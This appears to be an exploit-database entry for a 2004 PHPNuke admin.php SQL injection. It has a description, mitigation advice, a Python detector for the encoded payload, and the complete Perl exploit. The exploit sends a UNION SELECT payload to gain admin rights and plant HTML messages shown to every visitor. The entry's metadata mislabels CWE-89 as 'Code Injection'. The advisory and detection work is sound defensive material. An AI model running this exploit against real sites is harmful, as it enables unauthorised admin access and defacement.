Vendor: PHPNuke
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 89 (Code Injection)
Product Name: PHPNuke
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2004

Perl script for exploiting a PHPNuke admin.php vulnerability

This Perl script exploits a vulnerability in PHPNuke's admin.php. It sends a POST request to the admin.php endpoint carrying an "admin" parameter whose base64-decoded value is x' UNION SELECT 1/*:1 (the payload noted in the script's own comments), an SQL injection aimed at the admin credential lookup, together with add_radminsuper=1 and op=savemsg. With the resulting admin access it saves an admin message whose title and content are attacker-supplied HTML, which PHPNuke then renders for every visitor who views the message. The script loops over message ids 1 to 10 and logs each response to a local file. This exploit was published on milw0rm.com on September 16, 2004.

Mitigation:

To mitigate this vulnerability, update PHPNuke to the latest version, as this vulnerability has likely been patched in newer releases; because this entry lists no known patch, confirm after upgrading that admin.php no longer accepts a crafted admin value. Beyond upgrading, the root causes are the ones to address: the decoded admin credential must not be interpolated into SQL (use parameterized queries or strict validation of the name and hash fields), and saved admin messages should be HTML-escaped or restricted before display so that a compromised admin session cannot serve arbitrary markup to visitors. Keeping web applications updated and reviewing how they handle untrusted input remains the general defence against injection attacks of this kind. For detection, POST requests to admin.php with op=savemsg whose admin value decodes to SQL metacharacters are a clear signal worth alerting on.
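As an added example (not part of the original entry, and not PHPNuke's own code), the following Python implements the detection check suggested above: it parses a submitted form body, base64-decodes the admin parameter and flags SQL metacharacters in the name portion of the decoded value. The sample request bodies are constructed here; the name:hash layout of a legitimate admin value, and the field names beyond those used in the exploit on this page, are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote

# The exploit's admin value decodes to "x' UNION SELECT 1/*:1", i.e. a
# name part followed by ':' and a second field (layout inferred from the
# payload on this page). A genuine admin name never contains quotes,
# SQL keywords or comment sequences, so those are the indicators.
SQLI_INDICATORS = re.compile(r"['\"]|\bunion\b|\bselect\b|/\*|--", re.IGNORECASE)

# Constructed sample POST bodies for demonstration (not captured traffic).
# The benign admin value is a made-up name and hash.
BENIGN_ADMIN = base64.b64encode(b"alice:0123456789abcdef0123456789abcdef").decode()
SAMPLE_BODIES = [
    "title=Hello&content=Welcome&op=savemsg&admin=" + quote(BENIGN_ADMIN, safe=""),
    # The admin value below is the one used by the exploit on this page.
    "title=%3Ch1%3EJUST+TESTING%3C%2Fh1%3E&mid=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox"
    "&add_radminsuper=1&op=savemsg",
]


def decode_admin_param(body: str):
    """Return the base64-decoded 'admin' field of a form body, or None."""
    params = parse_qs(body, keep_blank_values=True)
    raw = params.get("admin", [""])[0]
    if not raw:
        return None
    # parse_qs turns an unencoded '+' into a space; base64 never contains
    # spaces, so restore it, then pad the string to a multiple of four.
    raw = raw.replace(" ", "+")
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def is_suspicious_admin_param(body: str) -> bool:
    """True when the name part of the decoded admin value looks like SQL."""
    decoded = decode_admin_param(body)
    if decoded is None:
        return False
    name_part = decoded.split(":", 1)[0]
    return SQLI_INDICATORS.search(name_part) is not None


def scan(bodies):
    """Return the request bodies that should raise an alert."""
    return [body for body in bodies if is_suspicious_admin_param(body)]


if __name__ == "__main__":
    for body in scan(SAMPLE_BODIES):
        print("SUSPICIOUS admin value:", decode_admin_param(body))
```

The check decodes before matching because the injection is invisible in the raw request body: the base64 string contains only letters and digits, so a signature on the undecoded parameter would miss it.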

Exploit-DB raw data:

#!/usr/bin/perl
#

use LWP; 

$log = "pos_komen_phpnuke_savemsg.txt"; 
$Agent = "Mbahmubangga/1.0";
$proxy = "http://172.9.1.11:80/"; # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);

$url = 'http://www.sitewithphpnuke.com/admin.php';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("\nProcessing: $url\n");

for ($a = 1; $a < 11 ; $a++) {

$mid=$a;

$loginpost = $url;
$loginrequest = HTTP::Request->new(POST => $loginpost);
$loginrequest->content_type('application/x-www-form-urlencoded');
$loginsend = 
'title=<h1>JUST TESTING</h1>'.
'&content=you can put HTML format here, all up to you now, 1 liner of course,
or multiple liner with dot'.
'&mlanguage='. #message language
'&expire=0'. #unlimited
'&active=1'. #yes
'&chng_date=0'.
'&view=1'. #all visitors
'&mdate='.
'&mid='.$mid. #the message id, commonly has value under 11
'&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. #our magic ammo ==> x'%20UNION%20SELECT%201/*:1
'&add_radminsuper=1'. #the super user / G O D
'&op=savemsg'; #operation
$loginrequest->content-length($loginsend);
$loginrequest->content($loginsend);
$loginresponse = $browser->request($loginrequest);
$logincek = $loginresponse->as_string;
#print ($logincek);


if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length Required)/){
printlog ("$mid attempting edit and saving message sending OK ".$loginresponse->status_line ."\n") ;
}
else {
printlog ("Could be failure ".$loginresponse->status_line ."\n");
last;
}

} #end of for

sub printlog {
print @_[0]; 
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}

# milw0rm.com [2004-09-16]